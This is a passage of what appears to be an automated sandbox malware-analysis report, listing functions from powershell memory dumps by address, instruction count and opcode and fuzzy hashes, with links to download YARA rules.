                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                                                    • Opcode ID: a23dbddabdeff2118725359b6e437596c0dba086aaab424361dcafbe072df9f1
                                                                                                                                                                                    • Instruction ID: 322ab5d9b9ac8e53bfa927926a827825d6e13c4a04557d5912e0a6004d237f7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a23dbddabdeff2118725359b6e437596c0dba086aaab424361dcafbe072df9f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD21D8F6D00216EBCF64DFE4C5402A9F7F0AF58610F154B66DC18EB284D7319944CB91
                                                                                                                                                                                    Function 08FA09F4 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl
                                                                                                                                                                                    • API String ID: 0-2571916112
                                                                                                                                                                                    • Opcode ID: cec195d24e2f921b4a3a47c9887fe69d0610b3c40b48ba0d3c88764e94442e8c
                                                                                                                                                                                    • Instruction ID: 1ce59070a6d0d6d7c96e9ea9112985dc1d25bb317bd67eabc79cf31cc8a1c3aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: cec195d24e2f921b4a3a47c9887fe69d0610b3c40b48ba0d3c88764e94442e8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 028129B5A00604DFDB14CF68D690E99BBB2AF89325F15C1A9D805AB351CB72EC42CF51
                                                                                                                                                                                    Function 070A8308 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: x.kk
                                                                                                                                                                                    • API String ID: 0-3782555193
                                                                                                                                                                                    • Opcode ID: 40631765838002f609423fca63bdf32acab14fb6794829c69271e516e9ceea27
                                                                                                                                                                                    • Instruction ID: 46f59d12569dbfd11ff5990cd8583deb29b2a603a06cbfccf52c60f3625b1e0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40631765838002f609423fca63bdf32acab14fb6794829c69271e516e9ceea27
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD317270B40214AFE7049BA8C951FAE7AE3AFC5704F10C524E9016F395CE76ED468BD1
                                                                                                                                                                                    Function 08FA06A8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q
                                                                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                                                                    • Opcode ID: 6807a04843fb0c533434bb46ecc99a8cb23cad8d4c1006f99eaa364ee8a9b4b6
                                                                                                                                                                                    • Instruction ID: c3c231c49c9ccd3891762abd37442d67f2651ea741377af53fc2f04f0bf7e5b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6807a04843fb0c533434bb46ecc99a8cb23cad8d4c1006f99eaa364ee8a9b4b6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 612132F2E00605DFDB209A34A400B7E76D69FD0626F24403AC804DB291EF3AD982CBE1
                                                                                                                                                                                    Function 08FA06A6 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q
                                                                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                                                                    • Opcode ID: 51676f4750206e06d2361278ee6b4dfc3217e7c800748e83b493943303418aeb
                                                                                                                                                                                    • Instruction ID: e14809ccbc41c742b9c2c6b556c861901a3380b03ee95dcddd0211c1c823861e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51676f4750206e06d2361278ee6b4dfc3217e7c800748e83b493943303418aeb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 862102F2E00605CFDB209A74A54077D72D29FD0626F28413AC805EB291EF3AD982CBE1
                                                                                                                                                                                    Function 070A45D8 Relevance: .5, Instructions: 469COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: accd9c9cd717aba9369f806e9f9e935dc5fcbc97ecdf9cd2d54e3b6760eec1d5
                                                                                                                                                                                    • Instruction ID: 733cd89f2cad8d54a847ced4aa886832881eee7cead91d85b90384ae536374bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: accd9c9cd717aba9369f806e9f9e935dc5fcbc97ecdf9cd2d54e3b6760eec1d5
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC127CB8B00245AFD754CB9CC541F9EBBF2AB89304F15C169E905AF351CBB2EC468B91
                                                                                                                                                                                    Function 070A74A0 Relevance: .5, Instructions: 460COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7afdc983add5bce6f7d2f3108aaa2a029fdaaf9b09eda2128241bd391501388e
                                                                                                                                                                                    • Instruction ID: e9678ee5640586530f32fb27f4cfa846bbd8557444267927164189d7c3727238
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7afdc983add5bce6f7d2f3108aaa2a029fdaaf9b09eda2128241bd391501388e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 011238B4B01205AFDB54CF98C541E9ABBF2BB88304F15D169E9156F391CB72EC82CB91
                                                                                                                                                                                    Function 08F91E68 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 14301e21c5bb8e95520a7b36d1636503665a645965b7663707ef4ec014863785
                                                                                                                                                                                    • Instruction ID: c270439174e02acb92ec6ac57557d4e4dea81c8cc6c785c72578bbecb33917cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14301e21c5bb8e95520a7b36d1636503665a645965b7663707ef4ec014863785
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14021B75A00209EFDF05CFA8D984A9DBBB2FF88310F248559E855AB365C735ED81CB90
                                                                                                                                                                                    Function 08F92428 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c853f3e3a9b1306bc627e456b59bd0f495af9d058313bb1bf7712c724e842c1b
                                                                                                                                                                                    • Instruction ID: ad62185259f62f6cdc4807801e730bc7093a1f649624fa444b44ac9d4ca25549
                                                                                                                                                                                    • Opcode Fuzzy Hash: c853f3e3a9b1306bc627e456b59bd0f495af9d058313bb1bf7712c724e842c1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E021A74A01209EFDF05CFA8D984AADBBB2FF48311F248159E855AB365C731ED85CB90
                                                                                                                                                                                    Function 070A45BD Relevance: .4, Instructions: 421COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8e826881d10bb2dbd11a3c78da9c13c2ae8ab5badfda559a501ed707f8dcf032
                                                                                                                                                                                    • Instruction ID: b8555857f860a288e9b174a4d51bd00bfdffe714055e1685ed716bddeeecb4fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e826881d10bb2dbd11a3c78da9c13c2ae8ab5badfda559a501ed707f8dcf032
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4025BB8A00245AFDB54CF98C541E9ABBF2EB89304F15C169E905AF351C7B2EC46CB91
                                                                                                                                                                                    Function 08F914A0 Relevance: .4, Instructions: 397COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2b3eded33fac0c0aab6d32a990d4cc2e131de9aad5b671b5a9f5b9e1682476f1
                                                                                                                                                                                    • Instruction ID: 80a2dc2daf40c8ed17e28f2ff7d8acb55b97d6995634c18e5b7671ad3a9ed060
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b3eded33fac0c0aab6d32a990d4cc2e131de9aad5b671b5a9f5b9e1682476f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69020874E0121ADFDB05CFA8D584AADBBB2FF48310F258569E845AB365C735EC81CB90
                                                                                                                                                                                    Function 08F90B80 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 029ba2553f31c96f699b33f9c5abb5f23ebf1085adafcb60b634cd3979900fa2
                                                                                                                                                                                    • Instruction ID: 8aa4f1ec9fcb29392ba743d831a85ffe54c9ec0288e4400598670e0a98b929bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 029ba2553f31c96f699b33f9c5abb5f23ebf1085adafcb60b634cd3979900fa2
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEE12A75A00609DFDF05CFA8C584A9DBBB2FF88314F248559E844AB365CB31ED82CB90
                                                                                                                                                                                    Function 00D1A9B9 Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8c45b11c89a909c6a68e8458319aea4ee6453a05b735bcebd7f6ea50934f911d
                                                                                                                                                                                    • Instruction ID: 1edec60d4fa696f5673d14f323c2a5a323d2ab8299d3b7b5b2ae582537868cfc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c45b11c89a909c6a68e8458319aea4ee6453a05b735bcebd7f6ea50934f911d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D11C74A05248AFCB05CFACE584ADDFBF2AF48310F258555E804AB365CB35ED85CB91
                                                                                                                                                                                    Function 00D17322 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e54538c6951f73f7efc2813c0107682d5060653c6e0629b2aee3f2920122f36a
                                                                                                                                                                                    • Instruction ID: db0b230c30704f0e5256b0b4598f79eefddfdec31d4148f014191a648ba01d7d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e54538c6951f73f7efc2813c0107682d5060653c6e0629b2aee3f2920122f36a
                                                                                                                                                                                    • Instruction Fuzzy Hash: FDA17135A042089FDB14DFA4E944AADBBF2FF84300F158559E806AB365DF74ED89CB90
                                                                                                                                                                                    Function 08F907C8 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1a1f14b9252c86d24ab3eefded90c10f65c0aa8e6d0bca72f9ef3393a6670f6a
                                                                                                                                                                                    • Instruction ID: c7bbe14d3f62b9ffb893d0613492b71f8a38af4eff1d8f3b2449a472aa0b0c8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a1f14b9252c86d24ab3eefded90c10f65c0aa8e6d0bca72f9ef3393a6670f6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07818E71B002098FDB14DB69D940AAEBBF6FFC8310F148469D4499B365DB34ED46CBA1
                                                                                                                                                                                    Function 00D17A5B Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: bca1df01e22b7c2724ff9ab605b87209ecd0f5636225c1d228b15d7712214b3d
                                                                                                                                                                                    • Instruction ID: a0b3ca8bf74dd543f755afe7ed60187c1e7a61a85419cde877ccdbfeb84faca4
                                                                                                                                                                                    • Opcode Fuzzy Hash: bca1df01e22b7c2724ff9ab605b87209ecd0f5636225c1d228b15d7712214b3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1371A3306042099FCB14DF78D840AEDBBF1FF85314F18856AE455DB662DB75AC86CB90
                                                                                                                                                                                    Function 00D17BDE Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cffde3fae127450206a83106ff6971236de157c2ed1294ce65d2309841bc8b3c
                                                                                                                                                                                    • Instruction ID: 0f9e6e2e5f5582b96d68607bf5b4a0a15e1baf28e20c075441309248ed77bac0
                                                                                                                                                                                    • Opcode Fuzzy Hash: cffde3fae127450206a83106ff6971236de157c2ed1294ce65d2309841bc8b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F713C70A042089FDB14DFA4D980BEDBBF2BF88304F148529D416AB7A1DF35AD86CB50
                                                                                                                                                                                    Function 00D1D670 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ffcdd4e78cc30ae0399c5d697e3f009e60dec726ec8ba967f381e036577ab0fd
                                                                                                                                                                                    • Instruction ID: 77b2e43e2aedd8d00f271520df5cf9bdeccba6bb62f58b518fbe3b63d8a7fde5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffcdd4e78cc30ae0399c5d697e3f009e60dec726ec8ba967f381e036577ab0fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32511F30A002049FDB09DB78C4957AEBBF7AF89310F188469D445AB7A5DB759C46CB60
                                                                                                                                                                                    Function 070A2125 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cf7dd7dc87be0ef73bd91ba9fdb877fe1774958e943af1d0957d72cd1a065a84
                                                                                                                                                                                    • Instruction ID: 2148b674c6e867fbd0cb66293a290e886d2afd15a4a25869dda002aec6f4c1c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf7dd7dc87be0ef73bd91ba9fdb877fe1774958e943af1d0957d72cd1a065a84
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53418FB2740251ABCB1457F89C01AAEBBD2AFE5314F1486BAD6015F761CE32CD42C3A2
                                                                                                                                                                                    Function 08F929E0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d52f968160710b0b984de8fb5fa14b2ae7d0e751dfa69cb63ca36ec39033b599
                                                                                                                                                                                    • Instruction ID: 4519d12632f35f896f0be64beba4e3317da48c73541ad9ca106f0207f223d362
                                                                                                                                                                                    • Opcode Fuzzy Hash: d52f968160710b0b984de8fb5fa14b2ae7d0e751dfa69cb63ca36ec39033b599
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07513E70E00609DFCB15CF68C4949AEBBB2FF48310B248659D965AB3A5C735EC42CB90
                                                                                                                                                                                    Function 00D17801 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b0ff08e78a11438544533d89237cb680f15647d796ee6202f810168b50ff48a0
                                                                                                                                                                                    • Instruction ID: 92a8aa3ae286a27b4b7f8cd96863c753439783d1157650d11feff64b72905c06
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0ff08e78a11438544533d89237cb680f15647d796ee6202f810168b50ff48a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F4180316442049FD715DBB4D858AEEBBB2EF89350F184469E406EB7B1CF349D82CBA0
                                                                                                                                                                                    Function 08F929D0 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1bdf3889d92836f50b1344b88988ed8cc50cd7a0972e0ebd9bed1a2396056d36
                                                                                                                                                                                    • Instruction ID: 534b035cd314cce66951310cf643b8a76e0a42e416571442caf102c2fe0f522c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bdf3889d92836f50b1344b88988ed8cc50cd7a0972e0ebd9bed1a2396056d36
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F512E70E00605DFCB15CFA8C5949AEB7F2FF48315B248658D965AB3A4C335EC52CB90
                                                                                                                                                                                    Function 00D1D6A0 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ff95008065fd46288ea4e1f0b2469446b4b0a7e9a1f70daa9e94faa4d1041dea
                                                                                                                                                                                    • Instruction ID: 6f20251ac71fc0c985ed3d8c8aab374e78422302a6d938902bbf48004145046d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff95008065fd46288ea4e1f0b2469446b4b0a7e9a1f70daa9e94faa4d1041dea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41FE30A002089FDB08DF79D5947AEBAE7AFC8310F18C469D805AB795CF75DC468BA0
                                                                                                                                                                                    Function 08F91490 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cc327a1891bf3857724e3fa1f69e7f1ac10f541e48e6c8fdf88a7a23403df530
                                                                                                                                                                                    • Instruction ID: 805202d07d5a67f38df9920496c2e7457a4a0d145ff0c7f210a4325507cfb504
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc327a1891bf3857724e3fa1f69e7f1ac10f541e48e6c8fdf88a7a23403df530
                                                                                                                                                                                    • Instruction Fuzzy Hash: 504109B4E001059FCB15CFACC9849AEB7B2BF48311B258669E855EB364D335EC81CF90
                                                                                                                                                                                    Function 08F92417 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: bf71a9849fe58b4cb5f15bd3394694b9b0600fe867bf2c628229decb74b0d7e6
                                                                                                                                                                                    • Instruction ID: a49e49aec3e3d6b73728028f926e53c8720cea2ccfa6f553cf685895ac538de8
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf71a9849fe58b4cb5f15bd3394694b9b0600fe867bf2c628229decb74b0d7e6
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2411874E011099FCB05CFACC994AAEBBB1FF48310B248658E865AB3A5C335EC51CF90
                                                                                                                                                                                    Function 08F91E57 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 971e19510bf5de1aa6fcd2d0734836f6a885bb1a1129b7fdf3a7e244fa0f6137
                                                                                                                                                                                    • Instruction ID: 8d0eb2e8be821af7cfe49b6b4f7430bdc7798a40560da461239af4ebf448a0c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 971e19510bf5de1aa6fcd2d0734836f6a885bb1a1129b7fdf3a7e244fa0f6137
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541F974E00209DFCB15CFACC5849AEBBF1FF48314B248669E955AB3A4D735AC91CB90
                                                                                                                                                                                    Function 00D17818 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
